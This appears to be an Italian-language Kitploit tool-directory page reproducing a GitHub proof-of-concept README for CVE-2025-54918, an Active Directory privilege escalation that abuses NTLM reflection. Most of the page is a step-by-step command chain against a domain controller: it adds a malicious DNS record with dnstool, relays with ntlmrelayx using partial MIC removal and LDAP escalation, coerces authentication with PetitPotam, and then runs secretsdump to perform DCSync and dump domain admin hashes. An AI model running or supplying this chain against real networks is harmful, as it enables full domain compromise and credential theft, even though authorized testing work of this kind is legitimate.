Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-54918-POC — POC per CVE-2025-54918 e una dimostrazione tecnica. | Kitploit
Strumenti/GitHubGitHub/wh0am123/cve-2025-54918-poc
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingAutenticazioneApprendimento e FormazioneRed TeamingLab e Pratica
GitHubwh0am123/cve-2025-54918-poc

CVE-2025-54918-POC

POC per CVE-2025-54918 e una dimostrazione tecnica.

Vedi Repository
647238 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-54918 – Prova di Concetto (PoC)

⚠️ Avviso Importante

IMPORTANTE:
Per testare CVE-2025-54918, è necessario creare un record DNS nell'ambiente Active Directory di destinazione.
Consulta sempre il cliente e ottieni l'autorizzazione esplicita prima di testare, poiché ciò può influenzare il comportamento del DNS e dell'autenticazione in ambienti di produzione.

Questo repository contiene una Prova di Concetto tecnica che dimostra come un utente di dominio con privilegi bassi possa elevare i propri privilegi fino a livello di amministratore di dominio abusando della riflessione NTLM combinata con la coercizione dell'autenticazione.

Nota: la CVE è sfruttabile anche con signing impostato a True, che è il valore predefinito per un controller di dominio. Inoltre, la correzione per CVE-2025–54918 riguardava Windows 2025 , mentre CVE-2025–33073 ha corretto (involontariamente) per Windows 2022.

Una spiegazione più tecnica è disponibile sulla mia pagina Medium: https://yousofnahya.medium.com/hands-on-exploitation-of-cve-2025-54918-cf376ebb40e1


Ambiente

  • IP del Controller di Dominio: 192.168.140.150 (Signing è True, che è il valore predefinito per un controller di dominio)
  • IP dell'Attaccante: 192.168.140.135
  • Dominio: nahya.local
  • Utente: test Utente di dominio valido (nessun privilegio DCSync)

Strumenti

Clona i repository necessari:

root@kitploit:~
git clone https://github.com/dirkjanm/krbrelayx.git
git clone https://github.com/decoder-it/impacket-partial-mic.git

Validazione di Base (Fallimento Previsto)

Verifica che l'utente non possa eseguire DCSync prima dello sfruttamento:

root@kitploit:~
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC

Normal User


Passo 1: Aggiungere un Record DNS Maligno

Crea un record DNS usando il nome NetBIOS + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA che risolve l'IP dell'attaccante.

root@kitploit:~
python3 dnstool.py -u 'nahya.local\USERNAME' -p 'PASSWORD' \
  dc.nahya.local -a add \
  -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' \
  -d '192.168.140.135' -dns-ip 192.168.140.150

Adding DNS


Passo 2: Avviare il Relay NTLM (Terminale 1)

Esegui ntlmrelayx con rimozione parziale del MIC e escalation LDAP abilitata:

root@kitploit:~
python3 impacket-partial-mic/examples/ntlmrelayx.py --remove-mic-partial -smb2support -t ldaps://DC  --escalate-user USERNAME  --no-validate-privs

start ntlmrelayx


Passo 3: Coercizione dell'Autenticazione del Controller di Dominio (Terminale 2)

Forza il Controller di Dominio ad autenticarsi al record DNS controllato dall'attaccante utilizzando una tecnica di coercizione (PetitPotam):

root@kitploit:~
nxc smb DC -u 'USERNAME' -p 'PASSWORD' -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA

coerce DC


Passo 4: Verificare lo Sfruttamento (DCSync)

Esegui di nuovo secretsdump per confermare l'escalation dei privilegi:

root@kitploit:~
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC

✅ Risultato atteso: DCSync riuscito e recupero degli hash dell'amministratore di dominio

DCSync Worked


Risultato

A questo punto, l'attaccante ha:

  • Inoltrato l'autenticazione NTLM dal Controller di Dominio (Signing True)
  • Elevato i privilegi tramite LDAP
  • Ottenuto DCSync, con conseguente compromissione totale del dominio

Fai riferimento all'articolo su Medium per una spiegazione approfondita della vulnerabilità e della catena di attacco.


🙏 Crediti

Questo lavoro non sarebbe stato possibile senza:

  • Bryan De Houwer – Autore di CVE-2025-54918 https://www.linkedin.com/in/bryan-de-houwer/
  • Andrea Pierini – Per la sua eccellente ricerca e i suoi blog su decoder.cloud https://www.linkedin.com/in/andrea-pierini-aba9a37/
  • Andrea Pierini – Per l'implementazione di impacket-partial-mic
    https://github.com/decoder-it/impacket-partial-mic

🔗 Riferimenti

  • Analisi della Vulnerabilità di Bypass dell'Autenticazione NTLM e LDAP – Blog di CrowdStrike
    https://www.crowdstrike.com/en-us/blog/analyzing-ntlm-ldap-authentication-bypass-vulnerability/

  • Avviso di Sicurezza Microsoft – CVE-2025-54918 – Guida all'Aggiornamento MSRC
    https://msrc.microsoft.com/update-guide/advisory/CVE-2025-54918


Avvertenza

Questa Prova di Concetto è fornita esclusivamente per scopi educativi e di test di sicurezza autorizzati.

  • Non utilizzare questa tecnica contro sistemi di cui non possiedi o non hai esplicita autorizzazione per testare.
  • L'autore declina ogni responsabilità per uso improprio o danni.
  • Segui sempre le pratiche di divulgazione responsabile e hacking etico.
Scarica lo strumento